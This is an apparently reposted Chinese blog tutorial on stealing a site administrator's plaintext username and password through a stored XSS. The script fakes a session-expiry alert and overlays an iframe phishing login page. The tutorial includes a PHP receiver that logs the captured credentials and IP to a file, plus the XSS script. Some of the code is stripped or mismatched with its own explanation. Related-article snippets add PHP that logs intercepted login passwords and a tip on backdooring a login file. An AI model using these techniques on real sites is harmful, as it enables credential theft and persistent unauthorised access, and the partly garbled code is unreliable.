php截获用户明文密码,【超详细入门教程】通过xss获取管理员明文账号密码

最新推荐文章于 2024-02-28 12:32:14 发布
最新推荐文章于 2024-02-28 12:32:14 发布
阅读量371 收藏 1
点赞数
文章标签: php截获用户明文密码

本帖最后由 说书人 于 2019-12-17 03:56 编辑

0x00  前言

本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略

xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。

但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。

随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登录信息外的cookie一般还是可以获取的),这是其一。

cookie具有时效性,比如说获取到的cookie过期了,而管理员又没有进行第二次登录并触发的情况下,你的权限就掉了,这是其二。

xss漏洞已修复,并且之前的代码已被删除或者无法触发(比如说xss在一个留言处,当后面有很多留言时,你的代码可能就到下一页去了,管理员也一般不会去翻,也就不会触发),这是其三

所以本篇文章就来介绍通过xss来获取管理员的账号密码,实现权限的维持,而且获取了账号密码,用途还有很多,比如说社工。

0x01 流程

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.webp.jpg (49.67 KB, 下载次数: 9)

2019-12-17 03:44 上传

打字描述不太直观,直接上一个流程图

0x02 准备工作

根据流程图中所展示,我们需要一个钓鱼页面(高仿原登录页面)和一个数据接收文件。为了简单明了的演示,这里准备了以下文件:

[AppleScript] 纯文本查看 复制代码admin_login.html //原管理登录页面

admin_index.html //原管理后台页面

fish.html //我们高仿的登录页面,也就是钓鱼页

get.php //数据接收文件

xss.js //xss的payload

代码量很小,我在这里直接贴出来:

[HTML] 纯文本查看 复制代码//admin_login.html 原管理登录页面

管理员登录

用户名:

密码:

[HTML] 纯文本查看 复制代码//admin_index.html 原管理后台页面

管理员后台

这里是管理员后台,你已成功登录

一键日卫星

最新留言
  • 说书人长得好帅
  • 楼上说得对

[HTML] 纯文本查看 复制代码//fish.html 我们仿的登录页面,也就是钓鱼页

管理员登录//这里发送给接收程序

用户名:

密码:

[PHP] 纯文本查看 复制代码//get.php 数据接收文件

$line = '----------------------------------'."\r\n";

$user = '账号:'.$_POST['username']."\r\n";

$pwd = '密码:'.$_POST['password']."\r\n";

$ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";

$url = '钓鱼模板:'.getenv('HTTP_REFERER')."\r\n";

$date ='日期:'. date("Y-m-d")."\r\n";

$result = $line.$url.$user.$pwd.$ip.$date;

file_put_contents('good.txt',$result, FILE_APPEND);

header("Location: [url]http://127.0.0.1/admin_index.html[/url]");

?>

[JavaScript] 纯文本查看 复制代码//xss.js xss的payload

setTimeout(function() {

alert("登陆过期,请重新登陆!");

parent.document.writeln("");

setTimeout(function() {

document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;");

},

100);

setTimeout(function() {

parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;");

},

100);

},

5000);

0x03 本地演示

首先管理员登录后台后,xss触发了,弹窗提示登录过期,需要重新登录

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2.webp.jpg (44.11 KB, 下载次数: 9)

2019-12-17 03:44 上传

然后出来的是iframe的钓鱼页面,注意地址没有跳转到我们的钓鱼页面url

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.webp.jpg (22.13 KB, 下载次数: 9)

2019-12-17 03:44 上传

管理员输入完账号密码后,又跳转回真实的后台页面,由于登录信息并没有失效,所以刚刚的登录仿真度极高。于此同时,我们的接收程序已经将管理员账号密码保存到了我们的钓鱼服务器上

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.webp.jpg (37.15 KB, 下载次数: 10)

2019-12-17 03:44 上传

0x04  结尾

xss.js的第14行的600000指的是每10分钟执行一次,符合一般的过期规则,大家也可以自行修改。由于仿真度极高,不易察觉,所以权限维持率高。

文章转自我自己的公众号:台下言书”,修改了下发出来(公众号发的时候因为有点标题党被喷惨了~),喜欢的可以关注下公众号。

贺易之
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php截取后台登陆密码的代码
12-19
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_POST[username].–passwd:.$_POST[password].–ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].–.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件 下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。 我只
获取php管理员密码,PHPWIND得到管理员密码的方法
weixin_35851515的博客
03-22 207
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办? 在登录文件做手脚啊...我来贴一个我修改的. login.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE: if($action=="login"){ /*记录他的问题和答案修改开始*/ $ques=($_POST['question']!=='-1') ? $_POST['...
php登录管理员怎么实现,php实现管理员登录功能
weixin_39885690的博客
03-10 904
if($_POST[user]) //判断是否输入用户名{$name=$_POST["user"]; //获取登录用户名$pass=$_POST["pass"]; //获取登录密码require "ch16-1.php"; //引用配置文件$link=mysql_con...
php实现简单的form表单账号登录功能
子非咸鱼的博客
01-23 3160
写了一个帐号登录功能。 index.html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title></title> </head> <body> <form action=&quo
python毕业设计之个人密码本管理系统(django)源码.zip
07-14
该项目旨在提供一个安全、便捷的方式来存储和管理用户的各种账号密码,确保信息安全。Django是Python Web开发的一个强大框架,以其高效、安全和可扩展性著称。 首先,我们要了解Django的基本概念。Django遵循模型-...
使用Cookie记录用户名和密码
03-19
在实际应用中,为了保证安全性,我们不会直接存储明文密码,而是使用哈希和盐值等方法对密码进行加密。例如,可以使用SHA-256或bcrypt算法对密码进行哈希,然后再加上一个随机的盐值,这样即使Cookie被截获,也无法...
防止别人查看密码的源代码
09-16
5. **使用密码管理器**:密码管理器可以帮助用户生成强密码,并在不同网站间安全地存储和管理这些密码。 6. **安全存储**:对于本地存储的密码,可以使用安全的加密算法,如AES,来加密存储,防止物理媒介被盗后...
基于易语言的简单的密码防盗技术
12-31
在本案例中,可能使用了某种加密方法来对用户输入的密码进行处理,使得即使密码截获,也无法轻易解密。 身份验证是确保只有合法用户可以访问密码的关键步骤。这通常包括用户名和密码的匹配,或者更复杂的身份验证...
js中利用cookie实现记住密码功能
11-28
在JavaScript中实现记住密码功能,通常我们会利用浏览器的Cookie机制来存储用户的相关信息。Cookie是一种在客户端存储数据的小型文本文件,它可以在用户关闭浏览器后再打开时仍然保留数据。以下是一个详细的过程,...
常见HTTP攻击赏析(3)
baijiafan的博客
04-28 2897
基于OpenAPI的已经开发一段时间了,在自己的网站上抓到了一些HTTP的攻击,没事,我们就汇总给大家做个赏析,也当是个提醒。对应的OpenAPI定义上传到了百家饭平台API攻击样例详情。
php抓取带帐号密码,PHP实现抓取迅雷VIP账号的方法
weixin_33789616的博客
03-29 100
本文实例讲述了PHP实现抓取迅雷VIP账号的方法。分享给大家供大家参考。具体如下:看了@Jinn_Wei Python版本的抓取账号,于是顺手写了个PHP版本PS1:代码没经过优化,只实现了基本的功能PS2:代码中使用了SnoopyPS3:测试地址:http://xunlei.kphcdr.com/*** 抓取爱密码迅雷VIP账号* @author kphcdr@163.com*/header("...
xss获取管理员用户密码(本地实战)
最新发布
2301_80661529的博客
02-28 452
有服务器的可以在服务器上实战。进入网页admin_login.html进行实战。实战完成后,在编写的所有文件目录下查找。,上面记录的管理员的账户密码。代码量比较少,就此复制粘贴即可。
php 获取用户名,如何在php获取会话ID或用户名?
weixin_35741494的博客
03-10 1277
我有一个用户可以登录的网站.我试过:当用户登录时,我将其会话设置为userlogin,但不会显示其用户名.This is the tutorial I used解决方法:所以设置它://Fetch the username from the database//The $login and $password I use here are examples. You should substitu...
php账号密码截取,代码区软件项目交易网,CodeSection,代码区,ChinaUnix博客PHP报错可导致直接获取任意用户MD5密码(奇葩方式)...
weixin_29069131的博客
03-12 69
漏洞标题ChinaUnix博�php报错可导致直接获取任意用户MD5密码(奇葩方式)相关厂商ChinaUnix漏洞作者HackBraid提交时间2015-10-08 15:12公开时间2015-10-13 15:14漏洞类型敏感信息泄露危害等级高自评Rank20漏洞状态漏洞已经通知厂商但是厂商忽略漏洞Tags标签敏感信息泄露,用户敏感信息泄漏漏洞详情http://blog.chinaunix.ne...
php 跳转 网址_php实现网址跳转的方法有哪些
weixin_39998859的博客
03-08 503
php实现网址跳转的方法有:1、利用header函数实现跳转,如【header('location:index.php');】;2、利用HTML头部的meta标签实现跳转;3、利用javascript实现跳转。方法如下:第一种:利用header()函数进行重定向。(推荐教程:php视频教程)注意:locationhe和“:”之间不能有空格。...
index.php m admin,phpcms修改后台访问路径/index.php?m=admin 增加安全性
weixin_42568801的博客
03-10 2971
一个网站无论好坏,后台安全都很重要,尤其是网站后台访问入口。下边我们来介绍下phpcms的后台路径如何修改:(默认访问方式:http://www.xxx.com/admin.php 或 http://www.xxx.com/index.php?m=admin或http://www.waypoints.cn/index.php?m=admin&c=index&a=login&am...
通过在URL中传输用户登录账号、密码,攻击者可通过CSRF、XSS等漏洞获取用户传输的敏感数据,易造成用户登录凭据泄露。的整改建议
05-12
针对此问题,可以采取以下措施进行整改: 1. 使用HTTPS协议,通过SSL/TLS加密通信,保障传输数据的安全性。 2. 在前端页面添加防护措施,比如使用CSP策略、XSS过滤器等,从而避免XSS攻击。 3. 在后端服务中对用户提交的数据进行严格的验证和过滤,避免CSRF攻击。 4. 采用一些安全的登录机制,如多因素身份认证、使用token等方式,提高登录凭据的安全性。 5. 定期对系统进行安全评估和漏洞扫描,及时修复安全漏洞,防止攻击者利用漏洞进行攻击。 6. 对用户进行安全教育和培训,提高用户的安全意识,减少用户被攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值